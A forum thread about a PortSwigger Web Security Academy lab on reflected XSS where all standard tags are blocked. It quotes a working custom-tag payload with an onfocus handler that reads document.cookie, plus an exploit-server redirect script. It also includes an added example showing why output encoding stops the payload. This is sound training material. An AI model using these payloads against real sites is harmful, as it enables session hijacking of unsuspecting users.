The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Lab Solution clarification

Suomynona | Last updated: Feb 07, 2022 06:21AM UTC

Lab: "Reflected XSS into HTML context with all tags blocked except custom ones"
https://portswigger.net/web-security/cross-site-scripting/contexts/lab-html-context-with-all-standard-tags-blocked

I would like some help understanding what I'm missing... Is this method any different than manually putting in the url this:

https://your-lab-id.web-security-academy.net/?=<xss+id=x+onfocus=alert(document.cookie)%20tabindex=1>#x

Also, side-note, the solution seems a bit finicky, and wasn't accepted at first, not to mention the fact that the alert doesn't come up even when it says it was solved/when you view the solved version. Could anyone tell me why? I apologize as I'm rather new to XSS and may need thorough explanations.

**SPOILERS**

Solution says:

1. Go to the exploit server and paste the following code, replacing your-lab-id with your lab ID:

   <script>
   location = 'https://your-lab-id.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';
   </script>

2. Click "Store" and "Deliver exploit to victim".

This injection creates a custom tag with the ID x, which contains an onfocus event handler that triggers the alert function. The hash at the end of the URL focuses on this element as soon as the page is loaded, causing the alert payload to be called.
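The following is an added example, not part of the original post or of PortSwigger's lab code. It splits the solution URL quoted above into the part the server receives and reflects (the `search` parameter) and the part only the browser sees (the `#x` fragment), then compares a tag blocklist with HTML output encoding on the decoded value. The `STANDARD_TAGS` list and the `blocklistAllows`, `escapeHtml` and `analyze` helpers are assumptions made for illustration; the lab's real filter is not shown on this page.

```javascript
// Added example (constructed). The filter is a hypothetical stand-in for a
// standard-tag blocklist, not the lab's actual server-side code.
const SOLUTION_URL =
  "https://your-lab-id.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x";

// Assumed blocklist of standard HTML tag names (deliberately incomplete).
const STANDARD_TAGS = ["script", "img", "svg", "body", "iframe", "a", "div", "input"];

// Blocklist check: allow the input unless it opens or closes a listed tag.
function blocklistAllows(input) {
  const names = [...input.matchAll(/<\s*\/?\s*([a-z][a-z0-9-]*)/gi)]
    .map((m) => m[1].toLowerCase());
  return names.every((name) => !STANDARD_TAGS.includes(name));
}

// Output encoding for HTML element content and quoted attribute values.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return text.replace(/[&<>"']/g, (ch) => map[ch]);
}

function analyze(urlString) {
  const url = new URL(urlString);
  // Decoded value of the query parameter: this is what the server reflects.
  const search = url.searchParams.get("search");
  return {
    search,
    // The fragment is never sent to the server; the browser uses it to
    // scroll to and focus the element whose id matches.
    fragment: url.hash,
    // A blocklist of standard tags lets an unknown tag name through.
    passesBlocklist: blocklistAllows(search),
    // Encoded on output, the same value is rendered as inert text.
    encoded: escapeHtml(search),
  };
}

console.log(analyze(SOLUTION_URL));
```

Encoding on output does not depend on knowing which tag names exist, which is why it holds where the tag blocklist does not.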

James, PortSwigger Agent | Last updated: Feb 08, 2022 10:31AM UTC

Hello,

Thanks for your message.

I have checked this lab and it is working as expected. The solution was accepted on the first attempt and the alert came up when viewing the exploit.

How this lab works is that the exploit server delivers your payload to a simulated "victim", who visits the page. You can see this in the "access log" and confirm the "victim" has visited the exploited page.

Please check the community solution video for the lab for an example of the steps.

Here is a link to learn more about XSS: https://portswigger.net/web-security/cross-site-scripting

Suomynona | Last updated: Feb 08, 2022 11:08PM UTC

Thank you, though I would like to know the real world scenario equivalent to utilizing the "exploit server" feature. And how that differs from manually putting it in the url.

James, PortSwigger Agent | Last updated: Feb 09, 2022 02:39PM UTC